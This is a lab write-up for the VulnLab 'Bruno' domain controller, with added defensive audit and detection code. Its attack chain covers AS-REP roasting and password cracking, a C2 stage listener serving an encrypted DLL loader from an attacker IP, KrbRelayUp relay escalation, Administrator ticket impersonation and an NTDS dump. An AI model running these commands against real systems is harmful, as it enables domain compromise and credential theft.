Bruno

| Machine ID | Machine IP |
|---|---|
| Bruno | 10.10.82.94 |

Enumeration: Phase-1

Port Scanning

sudo nmap -sC -sV -oA bruno 10.10.82.94
  • -sC: Runs default Nmap scripts.
  • -sV: Detects service versions.
  • -oA: Outputs in all formats (normal, XML, and grepable) and saves with the prefix bruno.

| Port | Service | Version |
|---|---|---|
| 21 | ftp | Microsoft ftpd |
| 53 | domain | Simple DNS Plus |
| 80 | http | Microsoft IIS httpd 10.0 |
| 88 | kerberos-sec | Microsoft Windows Kerberos |
| 135 | msrpc | Microsoft Windows RPC |
| 139 | netbios-ssn | Microsoft Windows netbios-ssn |
| 389 | ldap | Microsoft Windows Active Directory LDAP |
| 443 | ssl/http | Microsoft IIS httpd 10.0 |
| 445 | microsoft-ds? | |
| 464 | kpasswd5? | |
| 593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 636 | ssl/ldap | Microsoft Windows Active Directory LDAP |
| 3268 | ldap | Microsoft Windows Active Directory LDAP |
| 3269 | ssl/ldap | Microsoft Windows Active Directory LDAP |
| 3389 | ms-wbt-server | Microsoft Terminal Services |
| 5357 | http | Microsoft HTTPAPI httpd 2.0 |

Script output for port 21:

| ftp-anon: Anonymous FTP login allowed (FTP code 230)
06-29-22 04:55PM app
06-29-22 04:33PM benign
06-29-22 01:41PM malicious
06-29-22 04:33PM queue

Script output for port 3389:

- rdp-ntlm-info:
  - Target_Name: BRUNO
  - NetBIOS_Domain_Name: BRUNO
  - NetBIOS_Computer_Name: BRUNODC
  - DNS_Domain_Name: bruno.vl
  - DNS_Computer_Name: brunodc.bruno.vl
  - DNS_Tree_Name: bruno.vl
  - Product_Version: 10.0.20348
- ssl-cert: Subject: commonName=brunodc.bruno.vl
  - Not valid before: 2024-06-04T20:35:42

Add the hostnames from the scan results to /etc/hosts:

10.10.82.94 brunodc.bruno.vl bruno.vl

FTP - Port 21 Enumeration

Anonymous logins are allowed on the Brunodc domain controller.

ftp anonymous@brunodc.bruno.vl

FTP Shares

On the app share we found SampleScanner.exe along with some other files required by the executable.

On the benign share we found test.exe.

impacket-GetNPUsers bruno.vl/svc_scan -no-pass -request
hashcat svc_scan_hash /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
Cracked password: Sunshine1
cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --asreproast ASREPROAST

cme ldap brunodc.bruno.vl -u 'svc_scan' -p 'Sunshine1' --kerberoasting KERBEROASTING
hashcat ASREPROAST /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt
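
The svc_scan hash above was obtainable without a password because the account does not require Kerberos pre-authentication. The following audit is an added example, not part of the original writeup: it scans an LDIF export of user objects for enabled accounts that are AS-REP roastable or Kerberoastable. The LDIF data, the DNs and the account names other than svc_scan and BRUNODC$ are constructed.

```python
UAC_ACCOUNTDISABLE = 0x0002        # account is disabled
UAC_DONT_REQ_PREAUTH = 0x400000    # "Do not require Kerberos preauthentication"
# Constructed sample export (added example, not data from the lab).
SAMPLE_LDIF = """\
dn: CN=svc_scan,CN=Users,DC=bruno,DC=vl
sAMAccountName: svc_scan
userAccountControl: 4260352

dn: CN=svc_example,CN=Users,DC=bruno,DC=vl
sAMAccountName: svc_example
userAccountControl: 66048
servicePrincipalName: HTTP/app.bruno.vl

dn: CN=old_svc,CN=Users,DC=bruno,DC=vl
sAMAccountName: old_svc
userAccountControl: 4194818

dn: CN=BRUNODC,OU=Domain Controllers,DC=bruno,DC=vl
sAMAccountName: BRUNODC$
userAccountControl: 532480
servicePrincipalName: ldap/brunodc.bruno.vl
"""

def parse_ldif(text):
    """Split an LDIF export into entries: {lowercased attribute: [values]}."""
    entries = []
    for block in text.strip().split("\n\n"):
        entry = {}
        for line in block.splitlines():
            if ": " in line:
                attr, value = line.split(": ", 1)
                entry.setdefault(attr.lower(), []).append(value.strip())
        if entry:
            entries.append(entry)
    return entries

def audit_roastable(entries):
    """Return (account, finding) pairs for enabled accounts exposed to offline cracking."""
    findings = []
    for e in entries:
        name = e.get("samaccountname", ["?"])[0]
        uac = int(e.get("useraccountcontrol", ["0"])[0])
        if uac & UAC_ACCOUNTDISABLE:
            continue  # disabled accounts cannot request tickets
        if uac & UAC_DONT_REQ_PREAUTH:
            findings.append((name, "AS-REP roastable"))
        if "serviceprincipalname" in e and not name.endswith("$"):
            findings.append((name, "Kerberoastable"))  # user account with an SPN
    return findings
```

Accounts reported here should have pre-authentication re-enabled where possible and carry long random passwords, since a wordlist hit like the one above is what turns the exposed hash into a login.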

profiles new -b https://10.8.2.41:443 --format shellcode --arch amd64 osep_64

https -L 10.8.2.41 -l 443

stage-listener --url http://10.8.2.41:80 --profile osep_64 -C deflate9 --aes-encrypt-key D(G+KbPeShVmYq3t --aes-encrypt-iv 8y/B?E(G+KbPeShV

./cli_interface -o dll -u http://10.8.2.41:80/test.woff -c deflate -e aes -k 'D(G+KbPeShVmYq3t' -v '8y/B?E(G+KbPeShV' -p explorer.exe
VL{6efd85f20df80e14a0452381657809e4}

execute-assembly ./KrbRelayUp.exe "full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246"

sE9-bU4/lU7=
./Rubeus.exe asktgt /user:brunodc$ /certificate:<base64 certificate blob omitted> /password:sE9-bU4/lU7= /enctype:AES256 /nowrap

Method that worked for privilege escalation: add a machine account

execute-assembly ./CheckPort.exe

**CLSIDs** (confirmed working on Server 2019/2022 with ADCS installed):

- c980e4c2-c178-4572-935d-a8a429884806
- 90f18417-f0f1-484e-9d3c-59dceee5dbd8
- 03ca98d6-ff5d-49b8-abc6-03dd84127020
- d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
- 42cbfaa7-a4a7-47bb-b422-bd10e9d02700
- 000c101c-0000-0000-c000-000000000046
- 1b48339c-d15e-45f3-ad55-a851cb66be6b
- 49e6370b-ab71-40ab-92f4-b009593e4518
- 50d185b9-fff3-4656-92c7-e4018da4361d
- 3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)

execute-assembly ./KrbRelayUp.exe "full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246"
impacket-getST -impersonate 'Administrator' bruno.vl/'KRBRELAYUP$':'yT6#fH1-nK2$aH7=' -spn 'cifs/BRUNODC.bruno.vl'
export KRB5CCNAME=administrator@HOST_BRUNODC@BRUNO.VL.ccache
cme smb brunodc.bruno.vl -u 'Administrator' --use-kcache -M ntdsutil

VL{b528ba689d85ca396374c0f186087a7d}
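
Both KrbRelayUp runs above end with the domain controller's machine account writing to its own directory object (msDS-KeyCredentialLink for shadowcred, msDS-AllowedToActOnBehalfOfOtherIdentity for rbcd), and the rbcd run first creates the KRBRELAYUP$ machine account. The following detection sketch is an added example, not part of the original writeup: it correlates Security events 4741 and 5136, assuming Directory Service Changes auditing is enabled so that 5136 is logged. The events, the DC's DN, `lowpriv_user`, `WS01` and the `PROVISIONERS` allowlist are constructed.

```python
from datetime import datetime, timedelta

# Attributes written by the shadow-credentials and RBCD relay variants.
RELAY_ATTRS = {"msDS-AllowedToActOnBehalfOfOtherIdentity", "msDS-KeyCredentialLink"}
PROVISIONERS = {"Administrator"}  # assumption: accounts expected to create computer objects
DC_DN = "CN=BRUNODC,OU=Domain Controllers,DC=bruno,DC=vl"

# Constructed events; keys follow Windows Security event data field names.
EVENTS = [
    {"time": "2024-06-05T10:01:12", "id": 4741, "SubjectUserName": "lowpriv_user",
     "TargetUserName": "KRBRELAYUP$"},
    {"time": "2024-06-05T10:01:15", "id": 5136, "SubjectUserName": "BRUNODC$",
     "ObjectDN": DC_DN, "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
    {"time": "2024-06-05T11:30:00", "id": 5136, "SubjectUserName": "BRUNODC$",
     "ObjectDN": DC_DN, "AttributeLDAPDisplayName": "msDS-KeyCredentialLink"},
    {"time": "2024-06-05T12:00:00", "id": 5136, "SubjectUserName": "Administrator",
     "ObjectDN": "CN=WS01,CN=Computers,DC=bruno,DC=vl",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity"},
]

def is_self_write(ev):
    """True when a computer account modifies its own directory object."""
    subject = ev["SubjectUserName"]
    cn = ev["ObjectDN"].split(",", 1)[0].partition("=")[2]
    return subject.endswith("$") and subject[:-1].lower() == cn.lower()

def detect_relay(events, window=timedelta(minutes=10)):
    """Flag self-writes to relay-abusable attributes; severity is high when an
    unexpected computer account was created shortly before the write."""
    alerts, created = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        ts = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4741 and ev["SubjectUserName"] not in PROVISIONERS:
            created.append((ts, ev["TargetUserName"]))
        elif (ev["id"] == 5136 and ev["AttributeLDAPDisplayName"] in RELAY_ATTRS
              and is_self_write(ev)):
            recent = [name for t, name in created if ts - t <= window]
            alerts.append({"host": ev["SubjectUserName"],
                           "attribute": ev["AttributeLDAPDisplayName"],
                           "severity": "high" if recent else "medium",
                           "new_machine_accounts": recent})
    return alerts

if __name__ == "__main__":
    for alert in detect_relay(EVENTS):
        print(alert)
```

On the prevention side, the relay depends on LDAP accepting unsigned binds without channel binding, and the rbcd variant on ordinary users being able to add machine accounts, so enforcing LDAP signing and channel binding and setting ms-DS-MachineAccountQuota to 0 remove the preconditions.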

- https://gist.github.com/tothi/bf6c59d6de5d0c9710f23dae5750c4b9
- https://arz101.medium.com/vulnlab-bruno-f0129f60ac40
- https://notes.secure77.de/?link=%2FWriteUps%2FVulnLab%2FBruno%2FWriteup